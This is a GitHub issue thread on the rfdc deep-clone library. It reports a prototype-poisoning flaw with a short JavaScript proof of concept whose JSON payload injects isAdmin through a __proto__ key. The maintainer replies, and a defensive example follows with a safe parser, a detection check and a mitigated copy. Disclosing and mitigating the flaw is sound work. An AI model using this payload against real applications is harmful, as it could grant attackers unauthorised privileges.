davidmarkclements / rfdc

Really Fast Deep Clone
MIT License
643 stars 25 forks

Prototype Poisoning #45

Closed xclow3n closed 4 months ago

xclow3n commented 4 months ago

POC:

```js
// proto: false is the default, so this is the out-of-the-box configuration
const clone = require('rfdc')({proto: false});

// JSON.parse creates an OWN property literally named "__proto__"
const x = JSON.parse(`{"__proto__":{"isAdmin": true}}`);

// copying that key with target[key] = value triggers the __proto__ setter,
// so the clone's prototype becomes {isAdmin: true}
const f = clone(x);

console.log(f); // {}
console.log(f.isAdmin); // true
```

This code demonstrates how prototype poisoning can occur by cloning an object containing a `__proto__` property with default permissions using the rfdc library. The isAdmin property is injected into the object's prototype.

Implications

Mitigation

Since this library has a lot of weekly downloads, there might be multiple use cases that might be affected by this bug.

mcollina commented 4 months ago

This library follows the same pattern as Object.assign() and similar utilities, as they don't protect from this.

I'll add a note with a recommendation to use secure-json-parse to mitigate.
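As an added example (not code from this issue, from rfdc, or from secure-json-parse), the following shows the defender's side of the thread: a JSON.parse reviver that rejects the keys prototype poisoning relies on (a stand-in for the secure-json-parse recommendation, stricter than strictly needed), a check that detects a copy whose prototype was swapped, and a copy loop that cannot be poisoned because it avoids the `__proto__` setter. `naiveCopy` is an assumed minimal own-key loop standing in for the library's behaviour, and the sample JSON is constructed to match the proof of concept.

```javascript
'use strict';

// Keys whose presence in untrusted JSON we refuse outright.
const POISON_KEYS = new Set(['__proto__', 'constructor']);

// Parse untrusted JSON; throw if any object carries a key that would reach
// Object.prototype when copied with a `target[key] = value` loop.
function parseJsonSafe(text) {
  return JSON.parse(text, function revive(key, value) {
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      for (const k of Object.keys(value)) {
        if (POISON_KEYS.has(k)) throw new SyntaxError(`refusing JSON key "${k}"`);
      }
    }
    return value;
  });
}

// Assumed minimal own-key copy: `out[key] = value` hits the __proto__ setter.
function naiveCopy(obj) {
  const out = {};
  for (const key of Object.keys(obj)) out[key] = obj[key];
  return out;
}

// Detection: a plain-object copy whose prototype is no longer Object.prototype.
function hasForeignPrototype(obj) {
  return Object.getPrototypeOf(obj) !== Object.prototype;
}

// Mitigated copy: defineProperty creates an own "__proto__" data property
// instead of invoking the inherited setter, so the prototype is untouched.
function safeCopy(obj) {
  const out = {};
  for (const key of Object.keys(obj)) {
    Object.defineProperty(out, key,
      { value: obj[key], enumerable: true, writable: true, configurable: true });
  }
  return out;
}

// Constructed sample input matching the issue's proof of concept.
const POISONED_JSON = '{"__proto__":{"isAdmin":true}}';

function demo() {
  const raw = JSON.parse(POISONED_JSON);
  const bad = naiveCopy(raw), good = safeCopy(raw);
  let rejected = false;
  try { parseJsonSafe(POISONED_JSON); } catch (e) { rejected = true; }
  return { naivePoisoned: hasForeignPrototype(bad) && bad.isAdmin === true,
           safeCopyClean: !hasForeignPrototype(good) && good.isAdmin === undefined,
           safeParseRejected: rejected };
}
```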

xclow3n commented 4 months ago

perfect! thanks a lot